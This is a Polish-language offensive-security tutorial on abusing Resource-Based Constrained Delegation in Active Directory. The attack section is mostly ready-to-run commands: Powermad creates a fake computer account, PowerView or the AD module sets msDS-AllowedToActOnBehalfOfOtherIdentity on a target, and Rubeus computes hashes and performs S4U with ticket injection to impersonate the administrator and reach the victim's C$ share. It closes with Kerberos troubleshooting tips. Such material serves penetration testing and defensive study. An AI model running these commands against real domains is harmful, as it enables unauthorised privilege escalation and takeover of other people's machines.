Delegacja Ograniczona na Bazie Zasobów

Reading time: 7 minutes

Podstawy Delegacji Ograniczonej na Bazie Zasobów

To jest podobne do podstawowej Delegacji Ograniczonej, ale zamiast nadawania uprawnień do obiektu, aby podszywać się pod dowolnego użytkownika na maszynie, Delegacja Ograniczona na Bazie Zasobów ustawia w obiecie, kto może podszywać się pod dowolnego użytkownika wobec niego.

W tym przypadku, ograniczony obiekt będzie miał atrybut msDS-AllowedToActOnBehalfOfOtherIdentity z nazwą użytkownika, który może podszywać się pod dowolnego innego użytkownika wobec niego.

Inną ważną różnicą między tą Delegacją Ograniczoną a innymi delegacjami jest to, że każdy użytkownik z uprawnieniami do zapisu nad kontem maszyny (GenericAll/GenericWrite/WriteDacl/WriteProperty/etc) może ustawić msDS-AllowedToActOnBehalfOfOtherIdentity (W innych formach Delegacji potrzebne były uprawnienia administratora domeny).

Nowe Koncepcje

W Delegacji Ograniczonej powiedziano, że flaga TrustedToAuthForDelegation w wartości userAccountControl użytkownika jest potrzebna do wykonania S4U2Self. Ale to nie jest całkowita prawda.
Rzeczywistość jest taka, że nawet bez tej wartości, możesz wykonać S4U2Self wobec dowolnego użytkownika, jeśli jesteś usługą (masz SPN), ale jeśli masz TrustedToAuthForDelegation, zwrócony TGS będzie Forwardable, a jeśli nie masz tej flagi, zwrócony TGS nie będzie Forwardable.

Jednakże, jeśli TGS użyty w S4U2Proxy NIE jest Forwardable, próba nadużycia podstawowej Delegacji Ograniczonej nie zadziała. Ale jeśli próbujesz wykorzystać Delegację Ograniczoną na Bazie Zasobów, to zadziała.

Struktura Ataku

Jeśli masz uprawnienia równoważne do zapisu nad kontem Komputera, możesz uzyskać uprzywilejowany dostęp do tej maszyny.

Załóżmy, że atakujący ma już uprawnienia równoważne do zapisu nad komputerem ofiary.

1. Atakujący kompromituje konto, które ma SPN lub tworzy jedno (“Usługa A”). Zauważ, że jakikolwiek Użytkownik Administrator bez żadnych innych specjalnych uprawnień może utworzyć do 10 obiektów Komputerów (MachineAccountQuota) i ustawić im SPN. Więc atakujący może po prostu stworzyć obiekt Komputera i ustawić SPN.
2. Atakujący nadużywa swojego uprawnienia ZAPISU nad komputerem ofiary (Usługa B), aby skonfigurować delegację ograniczoną na bazie zasobów, aby pozwolić Usłudze A na podszywanie się pod dowolnego użytkownika wobec tego komputera ofiary (Usługa B).
3. Atakujący używa Rubeus, aby przeprowadzić pełny atak S4U (S4U2Self i S4U2Proxy) z Usługi A do Usługi B dla użytkownika z uprzywilejowanym dostępem do Usługi B.
4. S4U2Self (z konta SPN, które zostało skompromitowane/stworzone): Prosi o TGS Administratora dla mnie (Nie Forwardable).
5. S4U2Proxy: Używa nie Forwardable TGS z poprzedniego kroku, aby poprosić o TGS od Administratora do komputera ofiary.
6. Nawet jeśli używasz nie Forwardable TGS, ponieważ wykorzystujesz Delegację Ograniczoną na Bazie Zasobów, to zadziała.
7. Atakujący może przekazać bilet i podszyć się pod użytkownika, aby uzyskać dostęp do ofiary Usługi B.

Aby sprawdzić MachineAccountQuota domeny, możesz użyć:

Get-DomainObject -Identity "dc=domain,dc=local" -Domain domain.local | select MachineAccountQuota

Atak

Tworzenie obiektu komputera

Możesz stworzyć obiekt komputera w obrębie domeny używając powermad:

import-module powermad
New-MachineAccount -MachineAccount SERVICEA -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

# Check if created
Get-DomainComputer SERVICEA

Konfigurowanie delegacji ograniczonej opartej na zasobach

Używając modułu PowerShell activedirectory

Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount SERVICEA$ #Assing delegation privileges
Get-ADComputer $targetComputer -Properties PrincipalsAllowedToDelegateToAccount #Check that it worked

Używanie powerview

$ComputerSid = Get-DomainComputer FAKECOMPUTER -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$ComputerSid)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer $targetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

#Check that it worked
Get-DomainComputer $targetComputer -Properties 'msds-allowedtoactonbehalfofotheridentity'

msds-allowedtoactonbehalfofotheridentity
----------------------------------------
{1, 0, 4, 128...}

Wykonywanie pełnego ataku S4U

Przede wszystkim utworzyliśmy nowy obiekt Komputera z hasłem 123456, więc potrzebujemy hasha tego hasła:

.\Rubeus.exe hash /password:123456 /user:FAKECOMPUTER$ /domain:domain.local

To będzie drukować hashe RC4 i AES dla tego konta.
Teraz atak może być przeprowadzony:

rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<aes256 hash> /aes128:<aes128 hash> /rc4:<rc4 hash> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /domain:domain.local /ptt

Możesz wygenerować więcej biletów dla większej liczby usług, po prostu pytając raz, używając parametru /altservice w Rubeus:

rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<AES 256 hash> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /altservice:krbtgt,cifs,host,http,winrm,RPCSS,wsman,ldap /domain:domain.local /ptt

Uzyskiwanie dostępu

Ostatnia linia poleceń wykona pełny atak S4U i wstrzyknie TGS z Administratora do hosta ofiary w pamięci.
W tym przykładzie zażądano TGS dla usługi CIFS od Administratora, więc będziesz mógł uzyskać dostęp do C$:

ls \\victim.domain.local\C$

Wykorzystanie różnych biletów serwisowych

Dowiedz się o dostępnych biletach serwisowych tutaj.

Błędy Kerberos

• KDC_ERR_ETYPE_NOTSUPP: Oznacza to, że Kerberos jest skonfigurowany tak, aby nie używać DES ani RC4, a Ty dostarczasz tylko hasz RC4. Podaj Rubeus przynajmniej hasz AES256 (lub po prostu dostarcz mu hasze rc4, aes128 i aes256). Przykład: [Rubeus.Program]::MainString("s4u /user:FAKECOMPUTER /aes256:CC648CF0F809EE1AA25C52E963AC0487E87AC32B1F71ACC5304C73BF566268DA /aes128:5FC3D06ED6E8EA2C9BB9CC301EA37AD4 /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:Administrator /msdsspn:CIFS/M3DC.M3C.LOCAL /ptt".split())
• KRB_AP_ERR_SKEW: Oznacza to, że czas bieżącego komputera różni się od czasu DC i Kerberos nie działa prawidłowo.
• preauth_failed: Oznacza to, że podana nazwa użytkownika + hasze nie działają przy logowaniu. Mogłeś zapomnieć o dodaniu "$" do nazwy użytkownika podczas generowania haszy (.\Rubeus.exe hash /password:123456 /user:FAKECOMPUTER$ /domain:domain.local)
• KDC_ERR_BADOPTION: Może to oznaczać:
  • Użytkownik, którego próbujesz udawać, nie ma dostępu do żądanej usługi (ponieważ nie możesz go udawać lub nie ma wystarczających uprawnień)
  • Żądana usługa nie istnieje (jeśli prosisz o bilet dla winrm, ale winrm nie działa)
  • Utworzony fakecomputer stracił swoje uprawnienia do podatnego serwera i musisz je przywrócić.

Odniesienia

• https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
• https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/
• https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution#modifying-target-computers-ad-object
• https://stealthbits.com/blog/resource-based-constrained-delegation-abuse/
• https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61